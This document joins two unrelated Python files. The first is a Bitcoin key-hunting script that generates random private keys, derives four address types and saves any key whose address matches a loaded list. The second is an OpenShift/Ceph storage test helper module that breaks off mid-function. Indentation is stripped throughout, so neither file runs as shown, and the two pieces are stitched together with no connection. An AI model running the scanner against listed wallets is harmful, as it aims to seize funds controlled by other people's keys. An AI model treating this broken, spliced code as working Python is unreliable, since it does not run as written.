Bitcoin_randomCPU.py
'''
Made by Mizogg. Looks for Bitcoin Compressed and Uncompressed (1...), P2SH (3...) and Bech32 (bc1...) addresses,
using iceland2k14's secp256k1 https://github.com/iceland2k14/secp256k1 (fastest Python library).
Good Luck and Happy Hunting. Bitcoin_randomCPU.py Version 2: scans randomly in a range, with CPU speed improvements.
https://mizogg.co.uk
'''
import secp256k1 as ice
import time, multiprocessing, random
from multiprocessing import Event, Process, Queue, Value, cpu_count
from time import sleep
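# Illustrative note (not part of the original script): for every random key the
# script derives all four address types with the same ice calls used in main()
# below, e.g. for an arbitrary example key k:
#   k = 123456789
#   caddr  = ice.privatekey_to_address(0, True, k)   # P2PKH compressed (1...)
#   uaddr  = ice.privatekey_to_address(0, False, k)  # P2PKH uncompressed (1...)
#   p2sh   = ice.privatekey_to_address(1, True, k)   # P2SH (3...)
#   bech32 = ice.privatekey_to_address(2, True, k)   # Bech32 (bc1...)
# Each derived address is then looked up in the loaded address set.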
def hunt(start, stop, add, cores='all'):
try:
available_cores = cpu_count()
if cores == 'all':
cores = available_cores
elif 0 < int(cores) <= available_cores:
cores = int(cores)
else:
cores = 1
counter = Value('L')
match = Event()
queue = Queue()
workers = []
for r in range(cores):
p = Process(target=main, args=(counter, start, stop, add))
workers.append(p)
p.start()
for worker in workers:
worker.join()
except(KeyboardInterrupt, SystemExit):
exit('\nCTRL-C detected. Exiting gracefully. Thank you and Happy Hunting')
def main(counter, start, stop, add):
count = 0
iteration = 0
start_time = time.time()
while True:
count += 4
iteration += 1
ran=random.randrange(start,stop)
seed = str(ran)
HEX = "%064x" % ran
wifc = ice.btc_pvk_to_wif(HEX)
wifu = ice.btc_pvk_to_wif(HEX, False)
caddr = ice.privatekey_to_address(0, True, int(seed)) #Compressed
uaddr = ice.privatekey_to_address(0, False, int(seed)) #Uncompressed
P2SH = ice.privatekey_to_address(1, True, int(seed)) #p2sh
BECH32 = ice.privatekey_to_address(2, True, int(seed)) #bech32
if caddr in add or uaddr in add or P2SH in add or BECH32 in add :
print('\nMatch Found')
print('\nPrivatekey (dec): ', seed,'\nPrivatekey (hex): ', HEX, '\nPrivatekey Uncompressed: ', wifu, '\nPrivatekey compressed: ', wifc, '\nPublic Address 1 Uncompressed: ', uaddr, '\nPublic Address 1 Compressed: ', caddr, '\nPublic Address 3 P2SH: ', P2SH, '\nPublic Address bc1 BECH32: ', BECH32)
f=open("winner.txt","a")
f.write('\nPrivatekey (dec): ' + seed)
f.write('\nPrivatekey (hex): ' + HEX)
f.write('\nPrivatekey Uncompressed: ' + wifu)
f.write('\nPrivatekey compressed: ' + wifc)
f.write('\nPublic Address 1 Compressed: ' + caddr)
f.write('\nPublic Address 1 Uncompressed: ' + uaddr)
f.write('\nPublic Address 3 P2SH: ' + P2SH)
f.write('\nPublic Address bc1 BECH32: ' + BECH32)
f.close()
else:
if iteration % 10000 == 0:
elapsed = time.time() - start_time
print(f'It/CPU={iteration} checked={count} Hex={HEX} Keys/Sec={iteration / elapsed:.1f}')
if __name__ == '__main__':
print('[+] Starting.........Please Wait.....Bitcoin Address List Loading.....')
filename ='puzzle.txt'
with open(filename) as f:
line_count = 0
for line in f:
if line != "\n":
    line_count += 1
with open(filename) as file:
add = file.read().split()
add = set(add)
print('Total Bitcoin Addresses Loaded and Checking : ',str (line_count))
howmany=int(input("Number of Cores CPU -> "))
start=int(input("start range Min 1-115792089237316195423570985008687907852837564279074904382605163141518161494335 -> "))
stop=int(input("stop range Max 115792089237316195423570985008687907852837564279074904382605163141518161494336 -> "))
print("Starting search... Please Wait min range: " + str(start))
print("Max range: " + str(stop))
print("==========================================================")
print('Total Bitcoin Addresses Loaded and Checking : ',str (line_count))
hunt(start, stop, add, cores = howmany)
helpers.py
"""
Helper functions file for OCS QE
"""
import base64
import datetime
import hashlib
import json
import logging
import os
import re
import statistics
import tempfile
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from subprocess import PIPE, TimeoutExpired, run
from uuid import uuid4
import yaml
from ocs_ci.framework import config
from ocs_ci.ocs.utils import mirror_image
from ocs_ci.ocs import constants, defaults, node, ocp
from ocs_ci.ocs.exceptions import (
CommandFailed, ResourceWrongStatusException,
TimeoutExpiredError, UnavailableBuildException,
UnexpectedBehaviour
)
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pod, pvc
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.utility import templating
from ocs_ci.utility.retry import retry
from ocs_ci.utility.utils import (
TimeoutSampler,
ocsci_log_path,
run_cmd,
update_container_with_mirrored_image,
)
logger = logging.getLogger(__name__)
def create_unique_resource_name(resource_description, resource_type):
"""
Creates a unique object name by using the object_description,
object_type and a random uuid(in hex) as suffix
Args:
resource_description (str): The user provided object description
resource_type (str): The type of object for which the unique name
will be created. For example: project, pvc, etc
Returns:
str: A unique name
"""
return f"{resource_type}-{resource_description[:23]}-{uuid4().hex}"
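# Example (illustrative, assumed inputs):
#   create_unique_resource_name('mytest', 'pvc')
#   # -> 'pvc-mytest-' followed by the 32 hex characters of a uuid4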
def create_resource(do_reload=True, **kwargs):
"""
Create a resource
Args:
do_reload (bool): True for reloading the resource following its creation,
False otherwise
kwargs (dict): Dictionary of the OCS resource
Returns:
OCS: An OCS instance
Raises:
AssertionError: In case of any failure
"""
ocs_obj = OCS(**kwargs)
resource_name = kwargs.get('metadata').get('name')
created_resource = ocs_obj.create(do_reload=do_reload)
assert created_resource, (
f"Failed to create resource {resource_name}"
)
return ocs_obj
def wait_for_resource_state(resource, state, timeout=60):
"""
Wait for a resource to get to a given status
Args:
resource (OCS obj): The resource object
state (str): The status to wait for
timeout (int): Time in seconds to wait
Raises:
ResourceWrongStatusException: In case the resource hasn't
reached the desired state
"""
if (
resource.name == constants.DEFAULT_STORAGECLASS_CEPHFS
or resource.name == constants.DEFAULT_STORAGECLASS_RBD
):
logger.info("Skipping state check for the default Secret or StorageClass")
return
try:
resource.ocp.wait_for_resource(
condition=state, resource_name=resource.name, timeout=timeout
)
except TimeoutExpiredError:
logger.error(f"{resource.kind} {resource.name} failed to reach {state}")
resource.reload()
raise ResourceWrongStatusException(resource.name, resource.describe())
logger.info(f"{resource.kind} {resource.name} reached state {state}")
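# Illustrative sketch (not part of the original module): a typical create-and-wait
# flow built from the helpers above; the YAML constant and the 'Bound' state are
# the same ones this module uses elsewhere, the resource description is an
# assumed example value.
#
#   pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
#   pvc_data['metadata']['name'] = create_unique_resource_name('demo', 'pvc')
#   pvc_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
#   ocs_obj = create_resource(**pvc_data)
#   wait_for_resource_state(ocs_obj, 'Bound', timeout=90)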
def create_pod(
interface_type=None, pvc_name=None,
do_reload=True, namespace=defaults.ROOK_CLUSTER_NAMESPACE,
node_name=None, pod_dict_path=None, sa_name=None, dc_deployment=False,
raw_block_pv=False, raw_block_device=constants.RAW_BLOCK_DEVICE, replica_count=1,
pod_name=None, node_selector=None, command=None, command_args=None,
deploy_pod_status=constants.STATUS_COMPLETED
):
"""
Create a pod
Args:
interface_type (str): The interface type (CephFS, RBD, etc.)
pvc_name (str): The PVC that should be attached to the newly created pod
do_reload (bool): True for reloading the object after creation, False otherwise
namespace (str): The namespace for the new resource creation
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod
sa_name (str): Serviceaccount name
dc_deployment (bool): True if creating pod as deploymentconfig
raw_block_pv (bool): True for creating raw block pv based pod, False otherwise
raw_block_device (str): raw block device for the pod
replica_count (int): Replica count for deployment config
pod_name (str): Name of the pod to create
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
deploy_pod_status (str): Expected status of deploy pod. Applicable
only if dc_deployment is True
Returns:
Pod: A Pod instance
Raises:
AssertionError: In case of any failure
"""
if interface_type == constants.CEPHBLOCKPOOL:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_RBD_POD_YAML
interface = constants.RBD_INTERFACE
else:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_CEPHFS_POD_YAML
interface = constants.CEPHFS_INTERFACE
if dc_deployment:
pod_dict = pod_dict_path if pod_dict_path else constants.FEDORA_DC_YAML
pod_data = templating.load_yaml(pod_dict)
if not pod_name:
pod_name = create_unique_resource_name(
f'test-{interface}', 'pod'
)
pod_data['metadata']['name'] = pod_name
pod_data['metadata']['namespace'] = namespace
if dc_deployment:
pod_data['metadata']['labels']['app'] = pod_name
pod_data['spec']['template']['metadata']['labels']['name'] = pod_name
pod_data['spec']['replicas'] = replica_count
if pvc_name:
if dc_deployment:
pod_data['spec']['template']['spec']['volumes'][0][
'persistentVolumeClaim'
]['claimName'] = pvc_name
else:
pod_data['spec']['volumes'][0]['persistentVolumeClaim']['claimName'] = pvc_name
if interface_type == constants.CEPHBLOCKPOOL and raw_block_pv:
if pod_dict_path in [constants.FEDORA_DC_YAML, constants.FIO_DC_YAML]:
temp_dict = [
{'devicePath': raw_block_device, 'name': pod_data.get('spec').get(
'template').get('spec').get('volumes')[0].get('name')}
]
if pod_dict_path == constants.FEDORA_DC_YAML:
del pod_data['spec']['template']['spec']['containers'][0]['volumeMounts']
security_context = {'capabilities': {'add': ["SYS_ADMIN"]}}
pod_data['spec']['template']['spec']['containers'][0]['securityContext'] = security_context
pod_data['spec']['template']['spec']['containers'][0]['volumeDevices'] = temp_dict
elif pod_dict_path == constants.NGINX_POD_YAML:
temp_dict = [
{'devicePath': raw_block_device, 'name': pod_data.get('spec').get(
'containers')[0].get('volumeMounts')[0].get('name')}
]
del pod_data['spec']['containers'][0]['volumeMounts']
pod_data['spec']['containers'][0]['volumeDevices'] = temp_dict
else:
pod_data['spec']['containers'][0]['volumeDevices'][0]['devicePath'] = raw_block_device
pod_data['spec']['containers'][0]['volumeDevices'][0]['name'] = pod_data.get('spec').get('volumes')[
0].get('name')
if command:
if dc_deployment:
pod_data['spec']['template']['spec']['containers'][0]['command'] = command
else:
pod_data['spec']['containers'][0]['command'] = command
if command_args:
if dc_deployment:
pod_data['spec']['template']['spec']['containers'][0]['args'] = command_args
else:
pod_data['spec']['containers'][0]['args'] = command_args
if node_name:
if dc_deployment:
pod_data['spec']['template']['spec']['nodeName'] = node_name
else:
pod_data['spec']['nodeName'] = node_name
if node_selector:
if dc_deployment:
pod_data['spec']['template']['spec']['nodeSelector'] = node_selector
else:
pod_data['spec']['nodeSelector'] = node_selector
if sa_name and dc_deployment:
pod_data['spec']['template']['spec']['serviceAccountName'] = sa_name
# overwrite used image (required for disconnected installation)
update_container_with_mirrored_image(pod_data)
# configure http[s]_proxy env variable, if required
try:
http_proxy, https_proxy, no_proxy = get_cluster_proxies()
if http_proxy:
if 'containers' in pod_data['spec']:
container = pod_data['spec']['containers'][0]
else:
container = pod_data['spec']['template']['spec']['containers'][0]
if 'env' not in container:
container['env'] = []
container['env'].append({
'name': 'http_proxy',
'value': http_proxy,
})
container['env'].append({
'name': 'https_proxy',
'value': https_proxy,
})
container['env'].append({
'name': 'no_proxy',
'value': no_proxy,
})
except KeyError as err:
logging.warning(
"Http(s)_proxy variable wasn't configured, "
"'%s' key not found.", err
)
if dc_deployment:
ocs_obj = create_resource(**pod_data)
logger.info(ocs_obj.name)
assert (ocp.OCP(kind='pod', namespace=namespace)).wait_for_resource(
condition=deploy_pod_status,
resource_name=pod_name + '-1-deploy',
resource_count=0, timeout=360, sleep=3
)
dpod_list = pod.get_all_pods(namespace=namespace)
for dpod in dpod_list:
if '-1-deploy' not in dpod.name:
if pod_name in dpod.name:
return dpod
else:
pod_obj = pod.Pod(**pod_data)
pod_name = pod_data.get('metadata').get('name')
logger.info(f'Creating new Pod {pod_name} for test')
created_resource = pod_obj.create(do_reload=do_reload)
assert created_resource, (
f"Failed to create Pod {pod_name}"
)
return pod_obj
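# Illustrative sketch (assumed PVC name and namespace): attach an existing RBD PVC
# to a new test pod and wait for it to start.
#
#   pod_obj = create_pod(
#       interface_type=constants.CEPHBLOCKPOOL, pvc_name='my-test-pvc',
#       namespace='my-test-project'
#   )
#   wait_for_resource_state(pod_obj, 'Running', timeout=300)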
def create_project(project_name=None):
"""
Create a project
Args:
project_name (str): The name for the new project
Returns:
OCP: Project object
"""
namespace = project_name or create_unique_resource_name('test', 'namespace')
project_obj = ocp.OCP(kind='Project', namespace=namespace)
assert project_obj.new_project(namespace), f"Failed to create namespace {namespace}"
return project_obj
def create_multilpe_projects(number_of_project):
"""
Create one or more projects
Args:
number_of_project (int): Number of projects to be created
Returns:
list: List of project objects
"""
project_objs = [create_project() for _ in range(number_of_project)]
return project_objs
def create_secret(interface_type):
"""
Create a secret
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: An OCS instance for the secret
"""
secret_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
secret_data = templating.load_yaml(
constants.CSI_RBD_SECRET_YAML
)
secret_data['stringData']['userID'] = constants.ADMIN_USER
secret_data['stringData']['userKey'] = get_admin_key()
interface = constants.RBD_INTERFACE
elif interface_type == constants.CEPHFILESYSTEM:
secret_data = templating.load_yaml(
constants.CSI_CEPHFS_SECRET_YAML
)
del secret_data['stringData']['userID']
del secret_data['stringData']['userKey']
secret_data['stringData']['adminID'] = constants.ADMIN_USER
secret_data['stringData']['adminKey'] = get_admin_key()
interface = constants.CEPHFS_INTERFACE
secret_data['metadata']['name'] = create_unique_resource_name(
f'test-{interface}', 'secret'
)
secret_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
return create_resource(**secret_data)
def default_ceph_block_pool():
"""
Returns default CephBlockPool
Returns:
default CephBlockPool
"""
sc_obj = default_storage_class(constants.CEPHBLOCKPOOL)
cbp_name = sc_obj.get().get('parameters').get('pool')
return cbp_name if cbp_name else constants.DEFAULT_BLOCKPOOL
def create_ceph_block_pool(pool_name=None, failure_domain=None, verify=True):
"""
Create a Ceph block pool
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
failure_domain (str): Failure domain name
verify (bool): True to verify the pool exists after creation,
False otherwise
Returns:
OCS: An OCS instance for the Ceph block pool
"""
cbp_data = templating.load_yaml(constants.CEPHBLOCKPOOL_YAML)
cbp_data['metadata']['name'] = (
pool_name if pool_name else create_unique_resource_name(
'test', 'cbp'
)
)
cbp_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
cbp_data['spec']['failureDomain'] = failure_domain or get_failure_domin()
cbp_obj = create_resource(**cbp_data)
cbp_obj.reload()
if verify:
assert verify_block_pool_exists(cbp_obj.name), (
f"Block pool {cbp_obj.name} does not exist"
)
return cbp_obj
def create_ceph_file_system(pool_name=None):
"""
Create a Ceph file system
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
Returns:
OCS: An OCS instance for the Ceph file system
"""
cfs_data = templating.load_yaml(constants.CEPHFILESYSTEM_YAML)
cfs_data['metadata']['name'] = (
pool_name if pool_name else create_unique_resource_name(
'test', 'cfs'
)
)
cfs_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
cfs_data = create_resource(**cfs_data)
cfs_data.reload()
assert validate_cephfilesystem(cfs_data.name), (
f"File system {cfs_data.name} does not exist"
)
return cfs_data
def default_storage_class(
interface_type,
):
"""
Return default storage class based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: Existing StorageClass Instance
"""
external = config.DEPLOYMENT['external_mode']
if interface_type == constants.CEPHBLOCKPOOL:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD
else:
resource_name = constants.DEFAULT_STORAGECLASS_RBD
base_sc = OCP(
kind='storageclass',
resource_name=resource_name
)
elif interface_type == constants.CEPHFILESYSTEM:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_CEPHFS
else:
resource_name = constants.DEFAULT_STORAGECLASS_CEPHFS
base_sc = OCP(
kind='storageclass',
resource_name=resource_name
)
sc = OCS(**base_sc.data)
return sc
def create_storage_class(
interface_type, interface_name, secret_name,
reclaim_policy=constants.RECLAIM_POLICY_DELETE, sc_name=None,
provisioner=None
):
"""
Create a storage class
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
interface_name (str): The name of the interface
secret_name (str): The name of the secret
sc_name (str): The name of storage class to create
reclaim_policy (str): Type of reclaim policy. Defaults to 'Delete'
(eg., 'Delete', 'Retain')
Returns:
OCS: An OCS instance for the storage class
"""
sc_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
sc_data = templating.load_yaml(
constants.CSI_RBD_STORAGECLASS_YAML
)
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.RBD_INTERFACE
sc_data['provisioner'] = (
provisioner if provisioner else defaults.RBD_PROVISIONER
)
elif interface_type == constants.CEPHFILESYSTEM:
sc_data = templating.load_yaml(
constants.CSI_CEPHFS_STORAGECLASS_YAML
)
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.CEPHFS_INTERFACE
sc_data['parameters']['fsName'] = get_cephfs_name()
sc_data['provisioner'] = (
provisioner if provisioner else defaults.CEPHFS_PROVISIONER
)
sc_data['parameters']['pool'] = interface_name
sc_data['metadata']['name'] = (
sc_name if sc_name else create_unique_resource_name(
f'test-{interface}', 'storageclass'
)
)
sc_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['parameters'][
'csi.storage.k8s.io/provisioner-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/provisioner-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['parameters'][
'csi.storage.k8s.io/controller-expand-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/controller-expand-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['parameters']['clusterID'] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['reclaimPolicy'] = reclaim_policy
try:
del sc_data['parameters']['userid']
except KeyError:
pass
return create_resource(**sc_data)
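# Illustrative sketch (internal-testing helpers, as noted in the docstrings above):
# chain secret, block pool and storage class creation for an RBD-backed class.
#
#   secret = create_secret(constants.CEPHBLOCKPOOL)
#   cbp = create_ceph_block_pool()
#   sc = create_storage_class(
#       interface_type=constants.CEPHBLOCKPOOL,
#       interface_name=cbp.name,
#       secret_name=secret.name,
#   )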
def create_pvc(
sc_name, pvc_name=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE,
size=None, do_reload=True, access_mode=constants.ACCESS_MODE_RWO,
volume_mode=None
):
"""
Create a PVC
Args:
sc_name (str): The name of the storage class for the PVC to be
associated with
pvc_name (str): The name of the PVC to create
namespace (str): The namespace for the PVC creation
size (str): Size of pvc to create
do_reload (bool): True to wait for the PVC to reload after its creation, False otherwise
access_mode (str): The access mode to be used for the PVC
volume_mode (str): Volume mode for rbd RWX pvc i.e. 'Block'
Returns:
PVC: PVC instance
"""
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data['metadata']['name'] = (
pvc_name if pvc_name else create_unique_resource_name(
'test', 'pvc'
)
)
pvc_data['metadata']['namespace'] = namespace
pvc_data['spec']['accessModes'] = [access_mode]
pvc_data['spec']['storageClassName'] = sc_name
if size:
pvc_data['spec']['resources']['requests']['storage'] = size
if volume_mode:
pvc_data['spec']['volumeMode'] = volume_mode
ocs_obj = pvc.PVC(**pvc_data)
created_pvc = ocs_obj.create(do_reload=do_reload)
assert created_pvc, f"Failed to create resource {pvc_name}"
return ocs_obj
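# Illustrative sketch (assumed size and namespace): provision a single RWO PVC from
# the default RBD storage class and wait for it to bind.
#
#   sc_obj = default_storage_class(constants.CEPHBLOCKPOOL)
#   pvc_obj = create_pvc(sc_name=sc_obj.name, size='10Gi', namespace='my-test-project')
#   wait_for_resource_state(pvc_obj, 'Bound')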
def create_multiple_pvcs(
sc_name, namespace, number_of_pvc=1, size=None, do_reload=False,
access_mode=constants.ACCESS_MODE_RWO, burst=False
):
"""
Create one or more PVC as a bulk or one by one
Args:
sc_name (str): The name of the storage class to provision the PVCs from
namespace (str): The namespace for the PVCs creation
number_of_pvc (int): Number of PVCs to be created
size (str): The size of the PVCs to create
do_reload (bool): True to wait for the PVC to reload after its creation,
False otherwise
access_mode (str): The kind of access mode for PVC
Returns:
list: List of PVC objects
"""
if not burst:
if access_mode == 'ReadWriteMany' and 'rbd' in sc_name:
volume_mode = 'Block'
else:
volume_mode = None
return [
create_pvc(
sc_name=sc_name, size=size, namespace=namespace,
do_reload=do_reload, access_mode=access_mode, volume_mode=volume_mode
) for _ in range(number_of_pvc)
]
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data['metadata']['namespace'] = namespace
pvc_data['spec']['accessModes'] = [access_mode]
pvc_data['spec']['storageClassName'] = sc_name
if size:
pvc_data['spec']['resources']['requests']['storage'] = size
if access_mode == 'ReadWriteMany' and 'rbd' in sc_name:
pvc_data['spec']['volumeMode'] = 'Block'
else:
pvc_data['spec']['volumeMode'] = None
# Creating a temp directory to hold the files for the PVC creation
tmpdir = tempfile.mkdtemp()
logger.info('Creating the PVC yaml files for creation in bulk')
ocs_objs = []
for _ in range(number_of_pvc):
name = create_unique_resource_name('test', 'pvc')
logger.info(f"Adding PVC with name {name}")
pvc_data['metadata']['name'] = name
templating.dump_data_to_temp_yaml(pvc_data, f'{tmpdir}/{name}.yaml')
ocs_objs.append(pvc.PVC(**pvc_data))
logger.info('Creating all PVCs as bulk')
oc = OCP(kind='pod', namespace=defaults.ROOK_CLUSTER_NAMESPACE)
cmd = f"create -f {tmpdir}/"
oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
# Allow the system 1 sec for each PVC to create.
# This also prevents any other command from running in the system during
# this period of time.
logger.info(
f"Going to sleep for {number_of_pvc} sec "
"before verifying that the PVCs were created.")
time.sleep(number_of_pvc)
return ocs_objs
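# Illustrative sketch (assumed values): create 10 PVCs as a single bulk 'oc create'
# call rather than one by one.
#
#   pvc_objs = create_multiple_pvcs(
#       sc_name=sc_obj.name, namespace='my-test-project',
#       number_of_pvc=10, size='5Gi', burst=True
#   )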
def verify_block_pool_exists(pool_name):
"""
Verify if a Ceph block pool exists
Args:
pool_name (str): The name of the Ceph block pool
Returns:
bool: True if the Ceph block pool exists, False otherwise
"""
logger.info(f"Verifying that block pool {pool_name} exists")
ct_pod = pod.get_ceph_tools_pod()
try:
for pools in TimeoutSampler(
60, 3, ct_pod.exec_ceph_cmd, 'ceph osd lspools'
):
logger.info(f'POOLS are {pools}')
for pool in pools:
if pool_name in pool.get('poolname'):
return True
except TimeoutExpiredError:
return False
def get_admin_key():
"""
Fetches admin key secret from Ceph
Returns:
str: The admin key
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd('ceph auth get-key client.admin')
return out['key']
def get_cephfs_data_pool_name():
"""
Fetches ceph fs datapool name from Ceph
Returns:
str: fs datapool name
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd('ceph fs ls')
return out[0]['data_pools'][0]
def validate_cephfilesystem(fs_name):
"""
Verify CephFileSystem exists at Ceph and OCP
Args:
fs_name (str): The name of the Ceph FileSystem
Returns:
bool: True if the CephFileSystem exists on both the Ceph and OCP sides,
otherwise False (with the failure cause logged)
"""
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
ct_pod = pod.get_ceph_tools_pod()
ceph_validate = False
ocp_validate = False
result = cfs.get(resource_name=fs_name)
if result.get('metadata').get('name'):
logger.info("Filesystem %s was created on the OpenShift side", fs_name)
ocp_validate = True
else:
logger.info(
"Filesystem %s was not created on the OpenShift side", fs_name
)
return False
try:
for pools in TimeoutSampler(
60, 3, ct_pod.exec_ceph_cmd, 'ceph fs ls'
):
for out in pools:
result = out.get('name')
if result == fs_name:
logger.info("FileSystem %s was created on the Ceph side", fs_name)
ceph_validate = True
break
else:
logger.error("FileSystem %s is not present on the Ceph side", fs_name)
ceph_validate = False
if ceph_validate:
break
except TimeoutExpiredError:
pass
return True if (ceph_validate and ocp_validate) else False
def get_all_storageclass_names():
"""
Function for getting all storageclass
Returns:
list: list of storageclass name
"""
sc_obj = ocp.OCP(
kind=constants.STORAGECLASS,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = sc_obj.get()
sample = result['items']
storageclass = [
item.get('metadata').get('name') for item in sample if (
(item.get('metadata').get('name') not in constants.IGNORE_SC_GP2)
and (item.get('metadata').get('name') not in constants.IGNORE_SC_FLEX)
)
]
return storageclass
def delete_storageclasses(sc_objs):
"""
Function for deleting StorageClasses
Args:
sc_objs (list): List of SC objects for deletion
Returns:
bool: True if deletion is successful
"""
for sc in sc_objs:
logger.info("Deleting StorageClass with name %s", sc.name)
sc.delete()
return True
def get_cephblockpool_names():
"""
Function for getting all CephBlockPool
Returns:
list: list of cephblockpool name
"""
pool_obj = ocp.OCP(
kind=constants.CEPHBLOCKPOOL,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = pool_obj.get()
sample = result['items']
pool_list = [
item.get('metadata').get('name') for item in sample
]
return pool_list
def delete_cephblockpools(cbp_objs):
"""
Function for deleting CephBlockPool
Args:
cbp_objs (list): List of CBP objects for deletion
Returns:
bool: True if deletion of CephBlockPool is successful
"""
for cbp in cbp_objs:
logger.info("Deleting CephBlockPool with name %s", cbp.name)
cbp.delete()
return True
def get_cephfs_name():
"""
Function to retrieve the CephFS name
Returns:
str: Name of CFS
"""
ct_pod = pod.get_ceph_tools_pod()
result = ct_pod.exec_ceph_cmd('ceph fs ls')
return result[0]['name']
def pull_images(image_name):
"""
Function to pull images on all nodes
Args:
image_name (str): Name of the container image to be pulled
Returns: None
"""
node_objs = node.get_node_objs(get_worker_nodes())
for node_obj in node_objs:
logging.info(f'pulling image "{image_name} " on node {node_obj.name}')
assert node_obj.ocp.exec_oc_debug_cmd(
node_obj.name, cmd_list=[f'podman pull {image_name}']
)
def run_io_with_rados_bench(**kw):
""" A task for radosbench
Runs the radosbench command on the specified pod. If parameters are
not provided, the task assumes a few default parameters. This task
runs the command in a synchronous fashion.
Args:
**kw: Needs a dictionary of various radosbench parameters.
ex: pool_name:pool
pg_num:number of pgs for pool
op: type of operation {read, write}
cleanup: True OR False
Returns:
ret: return value of radosbench command
"""
logger.info("Running radosbench task")
ceph_pods = kw.get('ceph_pods') # list of pod objects of ceph cluster
config = kw.get('config')
role = config.get('role', 'client')
clients = [cpod for cpod in ceph_pods if role in cpod.roles]
idx = config.get('idx', 0)
client = clients[idx]
op = config.get('op', 'write')
cleanup = ['--no-cleanup', '--cleanup'][config.get('cleanup', True)]
pool = config.get('pool')
block = str(config.get('size', 4 << 20))
time = config.get('time', 120)
time = str(time)
rados_bench = (
f"rados --no-log-to-stderr "
f"-b {block} "
f"-p {pool} "
f"bench "
f"{time} "
f"{op} "
f"{cleanup} "
)
try:
ret = client.exec_ceph_cmd(ceph_cmd=rados_bench)
except CommandFailed as ex:
logger.error(f"Rados bench failed\n Error is: {ex}")
return False
logger.info(ret)
logger.info("Finished radosbench")
return ret
def get_all_pvs():
"""
Gets all pv in openshift-storage namespace
Returns:
dict: Dict of all pv in openshift-storage namespace
"""
ocp_pv_obj = ocp.OCP(
kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
return ocp_pv_obj.get()
# TODO: revert counts of tries and delay,BZ 1726266
@retry(AssertionError, tries=20, delay=10, backoff=1)
def validate_pv_delete(pv_name):
"""
validates if pv is deleted after pvc deletion
Args:
pv_name (str): Name of the PV (bound to the deleted PVC) to validate
Returns:
bool: True if deletion is successful
Raises:
AssertionError: If pv is not deleted
"""
ocp_pv_obj = ocp.OCP(
kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
try:
if ocp_pv_obj.get(resource_name=pv_name):
msg = f"{constants.PV} {pv_name} is not deleted after PVC deletion"
raise AssertionError(msg)
except CommandFailed:
return True
def create_pods(pvc_objs, pod_factory, interface, pods_for_rwx=1, status=""):
"""
Create pods
Args:
pvc_objs (list): List of ocs_ci.ocs.resources.pvc.PVC instances
pod_factory (function): pod_factory function
interface (int): Interface type
pods_for_rwx (int): Number of pods to be created if access mode of
PVC is RWX
status (str): If provided, wait for desired state of each pod before
creating next one
Returns:
list: list of Pod objects
"""
pod_objs = []
for pvc_obj in pvc_objs:
volume_mode = getattr(
pvc_obj, 'volume_mode', pvc_obj.get()['spec']['volumeMode']
)
access_mode = getattr(
pvc_obj, 'access_mode', pvc_obj.get_pvc_access_mode
)
if volume_mode == 'Block':
pod_dict = constants.CSI_RBD_RAW_BLOCK_POD_YAML
raw_block_pv = True
else:
raw_block_pv = False
pod_dict = ''
if access_mode == constants.ACCESS_MODE_RWX:
pod_obj_rwx = [pod_factory(
interface=interface, pvc=pvc_obj, status=status,
pod_dict_path=pod_dict, raw_block_pv=raw_block_pv
) for _ in range(1, pods_for_rwx)]
pod_objs.extend(pod_obj_rwx)
pod_obj = pod_factory(
interface=interface, pvc=pvc_obj, status=status,
pod_dict_path=pod_dict, raw_block_pv=raw_block_pv
)
